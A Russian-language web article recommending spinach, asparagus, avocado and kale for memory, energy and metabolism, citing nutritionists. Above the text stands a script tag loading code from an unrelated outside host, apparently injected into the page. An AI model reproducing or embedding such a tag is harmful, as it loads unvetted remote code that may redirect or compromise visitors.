27.04.2024

<script type="text/javascript" src="//newrezume.org/rtr/3"></script>

+


Зеленые продукты, известные своей естественной свежестью и ярким цветом, известны своим влиянием на здоровье и благополучие. Эти богатые питательными веществами продукты, в том числе листовая зелень, овощи и избранные фрукты, полны необходимых витаминов, минералов и антиоксидантов, которые играют жизненно важную роль в повышении энергии, памяти и метаболизма.

SheFinds проконсультировались с диетологами Мэри Сабат, Нэнси Лин и Кристианом Мори, чтобы раскрыть четыре зеленых продукта, которые могут улучшить память, энергию и обмен веществ. Они назвали шпинат, спаржу, авокадо и капусту.

Шпинат. Этот зеленый листовой источник энергии содержит железо, фолиевую кислоту и витамин К, которые способствуют поддержанию уровня энергии и поддерживают когнитивные функции и память.

Спаржа. Спаржа, богатая фолиевой кислотой, витамином К и антиоксидантами, способствует выработке энергии и когнитивному здоровью, улучшая память и функцию нейромедиаторов.

Авокадо. Авокадо, наполненное мононенасыщенными жирами, обеспечивает устойчивую энергию, поддерживает когнитивные функции и содержит спектр необходимых витаминов и минералов.

Капуста. Она может похвастаться витаминами А, С и К, минералами, такими как железо и кальций, а также антиоксидантами, которые защищают клетки мозга. Содержание клетчатки способствует пищеварению, регулирует уровень сахара в крови и поддерживает здоровый обмен веществ.

Эти зеленые продукты обеспечивают необходимые питательные вещества и антиоксиданты, которые способствуют жизнеспособности, когнитивным функциям и метаболическому благополучию. Включение этой мощной зелени в свой рацион может стать вкусным и питательным способом поддержать ваше тело и разум.

Курсор писал, что эксперты по питанию назвали фрукты и овощи, которые не нужно чистить – все витамины в кожуре.

Автор материала
Ирен Давид.


Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

60 элементов 0,708 сек.